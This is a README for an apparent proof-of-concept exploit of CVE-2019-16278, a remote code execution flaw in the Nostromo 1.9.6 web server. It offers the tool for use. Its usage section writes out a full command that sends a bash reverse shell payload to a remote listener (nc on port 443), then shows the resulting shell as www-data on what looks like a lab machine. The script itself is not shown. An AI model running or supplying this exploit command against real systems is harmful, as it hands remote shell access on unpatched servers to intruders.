This is a exploit of CVE-2019-16278 for Nostromo 1.9.6 RCE. This exploit allows RCE on the victim machine.# CVE-2019-16278-Nostromo-1.9.6-RCE
This is a exploit of CVE-2019-16278 for Nostromo 1.9.6 RCE. This exploit allows RCE on the victim machine.
# Requirements
optparse
socat
sys
# Usage
You can use the exploit as follows:
```bash
python3 CVE-2019-16278.py --ip=10.129.192.225 --port=80 --command="bash -c 'bash -i >& /dev/tcp/10.10.16.42/443 0>&1'"
b'HTTP/1.1 200 OK\r\nDate: Thu, 04 May 2023 22:05:36 GMT\r\nServer: nostromo 1.9.6\r\nConnection: close\r\n\r\n\r\n'
nc -nvlp 443
listening on [any] 443 ...
connect to [10.10.16.42] from (UNKNOWN) [10.129.192.225] 40752
bash: cannot set terminal process group (1005): Inappropriate ioctl for device
bash: no job control in this shell
www-data@traverxec:/usr/bin$ whoami
whoami
www-data
www-data@traverxec:/usr/bin$
```
Luck Hacking!!!
[4.0K] /data/pocs/19fd0d5b3163f1fd05eb930d9aaade4746ed61da
├── [1.5K] CVE-2019-16278.py
└── [ 784] README.md
0 directories, 2 files